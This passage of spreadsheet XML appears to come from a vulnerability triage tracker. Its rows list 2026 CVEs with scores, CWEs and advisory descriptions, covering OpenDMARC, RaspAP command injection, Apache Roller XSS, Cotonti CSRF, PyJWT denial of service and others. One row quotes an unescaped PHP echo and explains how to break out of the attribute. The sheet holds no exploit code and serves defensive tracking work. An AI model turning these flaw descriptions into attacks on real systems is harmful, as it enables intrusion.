          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F113" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G113" s="5" t="inlineStr"/>
      <c r="H113" s="5" t="inlineStr"/>
      <c r="I113" s="5" t="inlineStr"/>
      <c r="J113" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K113" s="5" t="inlineStr"/>
      <c r="L113" s="5" t="inlineStr"/>
      <c r="M113" s="5" t="inlineStr"/>
      <c r="N113" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O113" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P113" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q113" s="5" t="inlineStr"/>
      <c r="R113" s="5" t="inlineStr">
        <is>
          <t>CWE-755</t>
        </is>
      </c>
      <c r="S113" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in Trusted Domain Project OpenDMARC up to 1.4.2. This vulnerability affects the function strcasecmp in the library libopendmarc/opendmarc_policy.c. The manipulation results in handling of exceptional conditions. The attack can be executed remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101017</t>
        </is>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B114" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101093</t>
        </is>
      </c>
      <c r="D114" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E114" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F114" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G114" s="5" t="inlineStr"/>
      <c r="H114" s="5" t="inlineStr"/>
      <c r="I114" s="5" t="inlineStr"/>
      <c r="J114" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K114" s="5" t="inlineStr"/>
      <c r="L114" s="5" t="inlineStr"/>
      <c r="M114" s="5" t="inlineStr"/>
      <c r="N114" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O114" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P114" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q114" s="5" t="inlineStr"/>
      <c r="R114" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S114" s="5" t="inlineStr">
        <is>
          <t>Cotonti through 1.0.0 contains a cross-site request forgery vulnerability in admin.users.php that allows attackers to delete user groups without token verification. Attackers can craft malicious links or pages that trick authenticated administrators into deleting custom groups and their associated permissions by riding the administrator's session.</t>
        </is>
      </c>
      <c r="T114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101093</t>
        </is>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B115" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101100</t>
        </is>
      </c>
      <c r="D115" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E115" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F115" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G115" s="5" t="inlineStr"/>
      <c r="H115" s="5" t="inlineStr"/>
      <c r="I115" s="5" t="inlineStr"/>
      <c r="J115" s="5" t="inlineStr">
        <is>
          <t>f5, typescript</t>
        </is>
      </c>
      <c r="K115" s="5" t="inlineStr"/>
      <c r="L115" s="5" t="inlineStr"/>
      <c r="M115" s="5" t="inlineStr"/>
      <c r="N115" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O115" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P115" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q115" s="5" t="inlineStr"/>
      <c r="R115" s="5" t="inlineStr">
        <is>
          <t>CWE-459</t>
        </is>
      </c>
      <c r="S115" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in ag-ui-protocol ag-ui up to 2026-09-07. This vulnerability affects the function FilterToolCallsMiddleware of the file sdks/typescript/packages/client/src/middleware/filter-tool-calls.ts of the component Middleware. Executing a manipulation can lead to incomplete cleanup. The attack may be launched remotely. Upgrading to version 2026-09-08 is able to resolve this issue. This patch is called c346119fe870b70f5c19738ee5119f3e1456e59d. It is suggested to upgrade the affected component.</t>
        </is>
      </c>
      <c r="T115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101100</t>
        </is>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B116" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101859</t>
        </is>
      </c>
      <c r="D116" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E116" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G116" s="5" t="inlineStr"/>
      <c r="H116" s="5" t="inlineStr"/>
      <c r="I116" s="5" t="inlineStr"/>
      <c r="J116" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K116" s="5" t="inlineStr"/>
      <c r="L116" s="5" t="inlineStr"/>
      <c r="M116" s="5" t="inlineStr"/>
      <c r="N116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O116" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P116" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q116" s="5" t="inlineStr"/>
      <c r="R116" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S116" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in RaspAP raspap-webgui up to 3.5.5. Affected by this vulnerability is the function escapeshellcmd of the file ajax/openvpn/del_ovpncfg.php of the component OpenVPN Configuration Handler. Such manipulation of the argument cfg_id leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101859</t>
        </is>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B117" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82381</t>
        </is>
      </c>
      <c r="D117" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E117" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F117" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G117" s="5" t="inlineStr"/>
      <c r="H117" s="5" t="inlineStr"/>
      <c r="I117" s="5" t="inlineStr"/>
      <c r="J117" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K117" s="5" t="inlineStr"/>
      <c r="L117" s="5" t="inlineStr"/>
      <c r="M117" s="5" t="inlineStr"/>
      <c r="N117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O117" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P117" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q117" s="5" t="inlineStr"/>
      <c r="R117" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S117" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in Apache Roller 6.1.5 allows a user with authoring rights on a weblog to store crafted content that is later written into the authoring UI's JavaScript string literals and markup sinks without proper encoding, causing the stored script to execute in another author's or administrator's browser. No optional feature or non-default configuration is required; this affects weblogs with multiple authors or administrators who are not mutually trusted. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which moves those values out of JavaScript literals and writes them as text.</t>
        </is>
      </c>
      <c r="T117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82381</t>
        </is>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B118" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82387</t>
        </is>
      </c>
      <c r="D118" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E118" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F118" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G118" s="5" t="inlineStr"/>
      <c r="H118" s="5" t="inlineStr"/>
      <c r="I118" s="5" t="inlineStr"/>
      <c r="J118" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K118" s="5" t="inlineStr"/>
      <c r="L118" s="5" t="inlineStr"/>
      <c r="M118" s="5" t="inlineStr"/>
      <c r="N118" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O118" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P118" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q118" s="5" t="inlineStr"/>
      <c r="R118" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S118" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in Apache Roller 6.1.5 allows a user with media-upload rights to store active content on Roller's origin, because the media upload feature trusts the upload-supplied content type and serves the stored file back with that type. A victim who opens the uploaded file executes the stored script. Media uploads are disabled by default; only installations that enable them are affected, and the shipped type restrictions do not block active content once uploads are on. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which derives the stored type from file content and serves non-image media as a download.</t>
        </is>
      </c>
      <c r="T118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82387</t>
        </is>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B119" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88828</t>
        </is>
      </c>
      <c r="D119" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E119" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F119" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G119" s="5" t="inlineStr"/>
      <c r="H119" s="5" t="inlineStr"/>
      <c r="I119" s="5" t="inlineStr"/>
      <c r="J119" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K119" s="5" t="inlineStr"/>
      <c r="L119" s="5" t="inlineStr"/>
      <c r="M119" s="5" t="inlineStr"/>
      <c r="N119" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O119" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P119" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q119" s="5" t="inlineStr"/>
      <c r="R119" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="S119" s="5" t="inlineStr">
        <is>
          <t>The Blacklist Manager for WooCommerce WordPress plugin from 1.3.0 to 2.3.1 does not enforce its user blocking on every authentication path, allowing the holder of an account the site owner has blocked to keep authenticating with that account's privileges, without the block being enforced or recorded.</t>
        </is>
      </c>
      <c r="T119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88828</t>
        </is>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B120" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93539</t>
        </is>
      </c>
      <c r="D120" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E120" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F120" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G120" s="5" t="inlineStr"/>
      <c r="H120" s="5" t="inlineStr"/>
      <c r="I120" s="5" t="inlineStr"/>
      <c r="J120" s="5" t="inlineStr">
        <is>
          <t>kubernetes, requests, gin, suse</t>
        </is>
      </c>
      <c r="K120" s="5" t="inlineStr"/>
      <c r="L120" s="5" t="inlineStr"/>
      <c r="M120" s="5" t="inlineStr"/>
      <c r="N120" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O120" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P120" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q120" s="5" t="inlineStr"/>
      <c r="R120" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S120" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was discovered in Fleet's Git webhook receiver (the gitjob webhook service). When a webhook secret is not configured, incoming webhook requests are accepted without verification, and processing a request can change the spec.pollingInterval field of a matching GitRepo resource in any namespace. A caller with network access to the webhook service and no Kubernetes credentials can therefore alter GitRepo configuration outside
the namespaces they are authorized for.  This only affects SUSE Rancher Fleet 0.16 before 0.16.2, older versions are not affected.</t>
        </is>
      </c>
      <c r="T120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93539</t>
        </is>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B121" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101003</t>
        </is>
      </c>
      <c r="D121" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E121" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F121" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G121" s="5" t="inlineStr"/>
      <c r="H121" s="5" t="inlineStr"/>
      <c r="I121" s="5" t="inlineStr"/>
      <c r="J121" s="5" t="inlineStr">
        <is>
          <t>f5, go</t>
        </is>
      </c>
      <c r="K121" s="5" t="inlineStr"/>
      <c r="L121" s="5" t="inlineStr"/>
      <c r="M121" s="5" t="inlineStr"/>
      <c r="N121" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O121" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P121" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q121" s="5" t="inlineStr"/>
      <c r="R121" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="S121" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in Cesanta Mongoose up to 7.21. Affected by this vulnerability is the function fn of the file tutorials/mqtt/mqtt-server/main.c of the component MQTT Broker. Executing a manipulation can lead to stack-based buffer overflow. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks. Upgrading to version 7.22 addresses this issue. This patch is called a9df523f76f43a38bd53b4232b9cfd4c16869e71. Upgrading the affected component is advised.</t>
        </is>
      </c>
      <c r="T121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101003</t>
        </is>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B122" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101101</t>
        </is>
      </c>
      <c r="D122" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E122" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F122" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G122" s="5" t="inlineStr"/>
      <c r="H122" s="5" t="inlineStr"/>
      <c r="I122" s="5" t="inlineStr"/>
      <c r="J122" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="K122" s="5" t="inlineStr"/>
      <c r="L122" s="5" t="inlineStr"/>
      <c r="M122" s="5" t="inlineStr"/>
      <c r="N122" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O122" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P122" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q122" s="5" t="inlineStr"/>
      <c r="R122" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="S122" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in ag-ui-protocol ag-ui up to 2026-09-07. This issue affects the function JSON.parse of the file legacy/convert.ts of the component Middleware. The manipulation leads to uncaught exception. Remote exploitation of the attack is possible. Upgrading to version 2026-09-08 is capable of addressing this issue. The identifier of the patch is 30f8c794d5b73df5c610153043db502b2cc106cc. Upgrading the affected component is recommended.</t>
        </is>
      </c>
      <c r="T122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101101</t>
        </is>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B123" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101111</t>
        </is>
      </c>
      <c r="D123" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E123" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F123" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G123" s="5" t="inlineStr"/>
      <c r="H123" s="5" t="inlineStr"/>
      <c r="I123" s="5" t="inlineStr"/>
      <c r="J123" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K123" s="5" t="inlineStr"/>
      <c r="L123" s="5" t="inlineStr"/>
      <c r="M123" s="5" t="inlineStr"/>
      <c r="N123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O123" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P123" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q123" s="5" t="inlineStr"/>
      <c r="R123" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S123" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - ordasoft.com - Reflected Cross-Site Scripting in Book Library (Free) &lt; 6.4.6 - The public book-detail page template, site/views/view_book/tmpl/default.php, echoes the raw title request parameter directly into a double-quoted HTML attribute with no escaping function of any kind (echo $_REQUEST["title"];). A value containing a double quote closes the attribute early and allows arbitrary HTML/JavaScript to follow.</t>
        </is>
      </c>
      <c r="T123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101111</t>
        </is>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B124" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101917</t>
        </is>
      </c>
      <c r="D124" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E124" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F124" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G124" s="5" t="inlineStr"/>
      <c r="H124" s="5" t="inlineStr"/>
      <c r="I124" s="5" t="inlineStr"/>
      <c r="J124" s="5" t="inlineStr">
        <is>
          <t>python, requests</t>
        </is>
      </c>
      <c r="K124" s="5" t="inlineStr"/>
      <c r="L124" s="5" t="inlineStr"/>
      <c r="M124" s="5" t="inlineStr"/>
      <c r="N124" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O124" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P124" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q124" s="5" t="inlineStr"/>
      <c r="R124" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S124" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. Prior to 2.14.0, PyJWT get_signing_key_from_jwt is affected because unknown kid misses force refreshes without a negative cache or minimum refresh interval. This occurs when unauthenticated tokens repeatedly use the same unknown kid or varying kid values absent from the cached JWKS. As a result, each cache miss causes PyJWKClient to refresh the JWKS. Consequently, attacker traffic can amplify outbound requests to the configured JWKS endpoint. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101917</t>
        </is>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B125" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101918</t>
        </is>
      </c>
      <c r="D125" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E125" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F125" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G125" s="5" t="inlineStr"/>
      <c r="H125" s="5" t="inlineStr"/>
      <c r="I125" s="5" t="inlineStr"/>
      <c r="J125" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K125" s="5" t="inlineStr"/>
      <c r="L125" s="5" t="inlineStr"/>
      <c r="M125" s="5" t="inlineStr"/>
      <c r="N125" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O125" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P125" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q125" s="5" t="inlineStr"/>
      <c r="R125" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="S125" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.0.0a1 until 2.15.0, PyJWT PyJWKClient.get_signing_key_from_jwt is affected because payload parser catches ValueError but not RecursionError. This occurs when an attacker-controlled recursively nested payload reaches json.loads. As a result, documented PyJWT exception handling does not contain the failure. Consequently, an unauthenticated request can raise an exception that may produce an HTTP 500 response. The advisory-defined affected implementation also includes jwt/api_jwt.py, verify_signature=False. This issue is fixed in version 2.15.0.</t>
        </is>
      </c>
      <c r="T125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101918</t>
        </is>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B126" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102265</t>
        </is>
      </c>
      <c r="D126" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E126" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F126" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G126" s="5" t="inlineStr"/>
      <c r="H126" s="5" t="inlineStr"/>
      <c r="I126" s="5" t="inlineStr"/>
      <c r="J126" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K126" s="5" t="inlineStr"/>
      <c r="L126" s="5" t="inlineStr"/>
      <c r="M126" s="5" t="inlineStr"/>
      <c r="N126" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O126" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P126" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q126" s="5" t="inlineStr"/>
      <c r="R126" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="S126" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.13.0 until 2.14.0, PyJWS._load in jwt/api_jws.py is affected because parser catches ValueError but not RecursionError. This occurs when a deeply nested token header reaches json.loads. As a result, RecursionError escapes the documented PyJWT error hierarchy. Consequently, an unauthenticated malformed token can cause a request-level failure and HTTP 500. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102265</t>
        </is>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B127" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102277</t>
        </is>
      </c>
      <c r="D127" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E127" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F127" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G127" s="5" t="inlineStr"/>
      <c r="H127" s="5" t="inlineStr"/>
      <c r="I127" s="5" t="inlineStr"/>
      <c r="J127" s="5" t="inlineStr">
        <is>
          <t>node.js, rust</t>
        </is>
      </c>
      <c r="K127" s="5" t="inlineStr"/>
      <c r="L127" s="5" t="inlineStr"/>
      <c r="M127" s="5" t="inlineStr"/>
      <c r="N127" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O127" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P127" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q127" s="5" t="inlineStr"/>
      <c r="R127" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="S127" s="5" t="inlineStr">
        <is>
          <t>The brace-expansion library generates arbitrary strings containing a common prefix and suffix. Prior to 1.1.21, 2.1.7, 3.0.9, and 5.0.12, the expand function handles untrusted {a},b}-shaped patterns with many trailing closing braces by restarting its scan once for each trailing closing brace. The successive full-input rescans with linear working-string growth cause quadratic CPU time and memory pressure that can block the Node.js event loop. The process eventually recovers, making the impact a recoverable CPU denial of service. This issue is fixed in versions 1.1.21, 2.1.7, 3.0.9, and 5.0.12.</t>
        </is>
      </c>
      <c r="T127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102277</t>
        </is>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B128" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18825</t>
        </is>
      </c>
      <c r="D128" s="5" t="n">
        <v>5.3</v>
      </c>
